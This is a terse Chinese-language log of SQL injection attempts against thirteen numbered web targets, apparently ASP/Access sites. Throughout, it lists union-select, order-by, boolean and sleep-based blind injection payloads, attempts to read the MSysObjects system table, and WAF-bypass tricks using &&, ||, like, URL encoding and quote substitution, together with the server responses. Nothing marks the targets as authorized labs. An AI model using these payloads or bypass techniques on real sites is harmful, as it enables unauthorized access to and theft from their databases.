1.web1

access注入

Access数据库中没有注释符号.因此 /**/ 、 – 和 # 都没法使用。
Access是小型数据库，当容量到达100M左右的时候性能就会开始下降。
Access数据库不支持错误显示注入，Access数据库不能执行系统命令。

select len(“string”) 查询给定字符串的长度
select asc(“a”) 查询给定字符串的ascii值
top n 查询前n条记录
select mid(“string”,2,1) 查询给定字符串从指定索引开始的长度

and 1=1正常

and 1=2页面空白

存在数字型注入

id=33 order by 6#

id=33 order by 5

id=-33%20union%20select%201,2,3,4,5

-33%20union%20select%201,2,3,4,5%20from%20user

FROM 子句语法错误。

给表字段加入[user]

id=-33%20union%20select%201,2,3,4,5%20from%20[MSysObjects]

不能读取记录；在 ‘MSysObjects’ 上没有读取数据权限。

尝试了基本的表名如admin,user,manager,name等无果，不再尝试

xss

2.web2

xsk.asp?id=1%20and%201=1

回显

1=2不回显

存在数字型注入

3.web3

access注入

id=12’

id=12 and 1=1 和id=12 and 1=2不同，则判断数字型注入

id=12 order by 7#错误

id=12 order by 6#正确

id=-12%20union%20select%201,2,3,4,5,6

Microsoft OLE DB Provider for ODBC Drivers ���� ‘80040e21’

ODBC ��������֧����������ԡ�

/about.asp���� 16

chrom插件charset为gbk即可

Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e21’

ODBC 驱动程序不支持所需的属性。

/about.asp，行 16

id=12 and user>0

ODBC 驱动程序不支持所需的属性。

判断为access注入

4、d盾

数字型注入不存在

单引号、双引号禁用。撤

id=10 and 1=2 拦截

id= 10 &&(||) 1=2 参数错误

5、web5

检测 and(or) 数字 、&&(||) 数字

id=1’ id=2” 无回显

6、web6

id=1

id=2’ id=2 and 1=2

会跳回到id=1界面

撤

7.web7

id=1 and 1=1 1=2 数字型注入

id=1 order by 1#显示错误。那就是有waf了，撤

web8

id=12 and 1=1 拦截

id= 12 and 无回显

id =12 and 2无回显

id=12 and 2=1拦截

id=12 and 2 like 1 无回显

id=12 and 2 like 2回显

存在数字型注入

id=12%20order%20by 无回显

id=12%20order%20by%201# 无回显

考虑延时注入

1’ and sleep(5)–+ 5s后显示

and if(length(database())>0,sleep(5),1)#

没效果就and 改为 or

过滤了user(),database(),version(),sleep(),benchmark()、concat、load_file()

撤

web9

1=1 和 1=2 判断存在sql注入

id=12 order by 1# 显示为自定义错误信息。

id=12%20order%20/*|–|*/–+%20%0Aby%201%23–+绕过无果

web10

id=37 and(or) 1=2 拦截

id=37 && 1=2正常

id=37 || 1=2 屏蔽了此状态详细信息，状态码500

web11

ID=10%20&&%201=2–+ 没有指定操作参数

…and… 拦截

ID=11%20or%201=2–+没有指定操作参数

ID=11%20%61%6e%64%201=2–+ l拦截

web12

id=1221’ 重定向

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 107
Content-Type: text/html
Location: index.asp
Server: Microsoft-IIS/7.5
Date: Thu, 06 Jul 2023 13:20:22 GMT
Connection: close

<body><h\1>已移动</\h1>已移动<\a HREF=”index.asp”>´Ë´¦</a>.</\body>

id=1221 and 1=2 重定向

web13（单引号过滤）

编码或改成双引号，构造双引号为单引号

id=23” or “1” like “1“

关键字过滤